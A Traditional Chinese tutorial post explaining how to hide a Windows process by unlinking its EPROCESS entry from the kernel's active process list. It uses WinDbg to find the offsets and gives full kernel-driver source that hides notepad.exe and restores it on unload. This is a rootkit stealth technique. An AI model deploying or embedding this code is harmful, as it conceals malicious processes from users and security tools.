斷鏈隱藏進程及恢復（附代碼）

首先，我們知道，進程體EPROCESS是被系統維護在一個雙向鏈表LIST_ENTRY中的，那么，我們只要把進程的EPROCESS從這個鏈表中摘除，就可以實現進程隱藏了，當然，這只能瞞過進程管理器和zwQuerySystemInformation，暴力枚舉依舊可以發現斷鏈隱藏的進程，因為進程體還在內存中，這個以后再說。

 

要隱藏我們指定的某個進程，我們肯定需要遍歷整個EPROCESS鏈表， 當EPROCESS對應的進程名與 我們所指定的進程的進程名一樣時，我們就把該EPROCESS從鏈表中移除。

這里。我們遇到兩個問題，：

1.既然要遍歷鏈表，我們就要知道每個結構的前后結構；

2.既然要對比進程名，我們就要知道進程名放在哪個地方；

 

以上兩個問題，借助Windbg，我們就可以解決

下面我們以x86為例：

在windbg中，我們先看一下EPROCESS的結構，輸入命令dt _EPROCESS,可以發現在偏移0x88處，有一個變量ActiveProcessLinks，它的類型為LIST_ENTRY

 

 

在輸入命令dt _LIST_ENTRY,查看LIST_ENTRY的結構，可以看到變量FLink和BLink，FLink指向當前節點的后一個節點的ActiveProcessLinks地址，BLink指向當前結點的前一個節點的ActiveProcessLinks地址

 

 

繼續往下，我們可以看到在偏移0x174處，出現了ImageFileName，這里存的就是我們要找的進程名

 

 

下面我們切入一個進程實際看一下  輸入命令！process 0 0，就可以顯示所有進程信息

 

 

然后，輸入命令dt  _EPROCESS  895d6da0就可以切入進程smss.exe了   

 

     

 

smss.exe的后一個結點的 ActiveProcessLinks就放在地址0x89a6d778中，用dd 0x89a6d778命令查看地址0x89a6d778中的內容，

 

 

注意，因為FLink指向當前節點的后一個節點的ActiveProcessLinks地址，所以后一個節點的EPROCESS地址為ActiveProcessLinks地址減去FLink偏移0x88

然后就可以找到smss.exe的下一個進程winlogon.exe了，這就印證了上面的截圖中看到smss.exe的下一個進程是winlogon.exe

 

 

這樣，我們就解決了我們所遇到的問題，對於x64，方法是一樣的，讀者可以自行練習。代碼如下：

#ifndef CXX_HIDEPROCESS_H
#    include "HideProcess.h"
#endif


ULONG_PTR ActiveOffsetPre =  0;
ULONG_PTR ActiveOffsetNext = 0;
ULONG_PTR ImageName = 0; 
WIN_VERSION WinVersion = WINDOWS_UNKNOW;

PLIST_ENTRY Temp = NULL;
PLIST_ENTRY HeadEntry = NULL;
NTSTATUS
    DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
{


    DbgPrint("DriverEntry\r\n");

    DriverObject->DriverUnload = UnloadDriver;


    WinVersion = GetWindowsVersion();


    switch(WinVersion)
    {
    case WINDOWS_XP:   //32Bits
        {

            ActiveOffsetPre =  0x8c;
            ActiveOffsetNext = 0x88;
            ImageName = 0x174; 
            break;
        }

    case WINDOWS_7:   //64Bits 
        {
            ActiveOffsetPre =  0x190;
            ActiveOffsetNext = 0x188;
            ImageName = 0x2e0; 
            break;
        }
    }
    

    HideProcess("notepad.exe");

    HeadEntry = (PLIST_ENTRY)((ULONG_PTR)PsGetCurrentProcess()+ActiveOffsetNext);// 在DriverEntry中執行得到的才是System進程

    return STATUS_SUCCESS;

}

VOID HideProcess(char* ProcessName)
{
    PEPROCESS EProcessCurrent = NULL;
    PEPROCESS EProcessPre = NULL;


    EProcessCurrent = PsGetCurrentProcess();    //System  EProcess
    
    

    EProcessPre = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)EProcessCurrent+ActiveOffsetPre)))-ActiveOffsetNext);

    //DbgPrint("EProcessCurrent: 0x%p\r\n",EProcessCurrent);  

    //DbgPrint("EProcessNext: 0x%p\r\n",EProcessNext);  



    while (EProcessCurrent!=EProcessPre)
    {
        //    DbgPrint("%s\r\n",(char*)((ULONG_PTR)EProcessCurrent+ImageName));


        if(strcmp((char*)((ULONG_PTR)EProcessCurrent+ImageName),ProcessName)==0)
        {


            Temp = (PLIST_ENTRY)((ULONG_PTR)EProcessCurrent+ActiveOffsetNext);

            if (MmIsAddressValid(Temp))
            {
                //    Temp->Blink->Flink = Temp->Flink;
                //    Temp->Flink->Blink = Temp->Blink;   //數據結構  不穩定


                RemoveEntryList(Temp);


            }


            break;
        }

        EProcessCurrent = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)EProcessCurrent+ActiveOffsetNext)))-ActiveOffsetNext);


    }
}

VOID UnloadDriver(PDRIVER_OBJECT  DriverObject)
{
    ResumeProcess();
    DbgPrint("UnloadDriver\r\n");
}

VOID ResumeProcess()
{
    
    if(Temp!=NULL)
    {
        InsertHeadList(HeadEntry,Temp);
    }
    

}






WIN_VERSION GetWindowsVersion()
{
    RTL_OSVERSIONINFOEXW osverInfo = {sizeof(osverInfo)}; 
    pfnRtlGetVersion RtlGetVersion = NULL;
    WIN_VERSION WinVersion;
    WCHAR wzRtlGetVersion[] = L"RtlGetVersion";

    RtlGetVersion = GetFunctionAddressByName(wzRtlGetVersion);    //Ntoskrnl.exe  導出表
    if (RtlGetVersion)
    {
        RtlGetVersion((PRTL_OSVERSIONINFOW)&osverInfo); 
    } 
    else 
    {
        PsGetVersion(&osverInfo.dwMajorVersion, &osverInfo.dwMinorVersion, &osverInfo.dwBuildNumber, NULL);   //Documet
    }

    DbgPrint("Build Number: %d\r\n", osverInfo.dwBuildNumber);

    if (osverInfo.dwMajorVersion == 5 && osverInfo.dwMinorVersion == 1) 
    {
        DbgPrint("WINDOWS_XP\r\n");
        WinVersion = WINDOWS_XP;
    }
    else if (osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 1)
    {
        DbgPrint("WINDOWS 7\r\n");
        WinVersion = WINDOWS_7;
    }
    else if (osverInfo.dwMajorVersion == 6 && 
        osverInfo.dwMinorVersion == 2 &&
        osverInfo.dwBuildNumber == 9200)
    {
        DbgPrint("WINDOWS 8\r\n");
        WinVersion = WINDOWS_8;
    }
    else if (osverInfo.dwMajorVersion == 6 && 
        osverInfo.dwMinorVersion == 3 && 
        osverInfo.dwBuildNumber == 9600)
    {
        DbgPrint("WINDOWS 8.1\r\n");
        WinVersion = WINDOWS_8_1;
    }
    else
    {
        DbgPrint("WINDOWS_UNKNOW\r\n");
        WinVersion = WINDOWS_UNKNOW;
    }

    return WinVersion;
}


PVOID 
    GetFunctionAddressByName(WCHAR *wzFunction)
{
    UNICODE_STRING uniFunction;  
    PVOID AddrBase = NULL;

    if (wzFunction && wcslen(wzFunction) > 0)
    {
        RtlInitUnicodeString(&uniFunction, wzFunction);      //常量指針
        AddrBase = MmGetSystemRoutineAddress(&uniFunction);  //在System 進程  第一個模塊  Ntosknrl.exe  ExportTable
    }

    return AddrBase;
}